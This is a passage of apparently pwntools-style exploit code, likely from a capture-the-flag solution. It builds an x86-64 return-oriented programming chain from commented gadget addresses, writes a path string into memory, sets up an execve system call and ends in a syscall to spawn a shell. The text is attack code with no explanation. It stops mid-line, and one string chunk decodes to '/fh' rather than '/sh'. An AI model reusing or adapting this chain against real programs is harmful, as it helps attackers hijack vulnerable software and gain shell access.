payload = p64(0x4017d3)
#0x00000000004017d3: pop rdi; ret; 
payload += p64(0x43a070)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x6e69622f)+p64(0x0)+p64(0x42d099)
# 0x42d099: xchg esi, eax ; retf
payload += p32(0x427ae4)+p32(0x33)
# 0x0000000000427ae4: stosd dword ptr [rdi], eax; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x43a074)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x68662f)+p64(0x0)+p64(0x42d099)
# 0x42d099: xchg esi, eax ; retf
payload += p32(0x427ae4)+p32(0x33)
# 0x0000000000427ae4: stosd dword ptr [rdi], eax; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x43a070)+p64(0x41c02d)
# 0x000000000041c02d: pop rcx; ret; 
payload += p64(0x0)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x3b)+p64(0x0)+p64(0x42d099)
# 0x42d099: xchg esi, eax ; retf
payload += p32(0x4017d1)+p32(0x33)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x40e359)
# 0x000000000040e359: mov edx, ecx; syscall; ret; 
payload +=
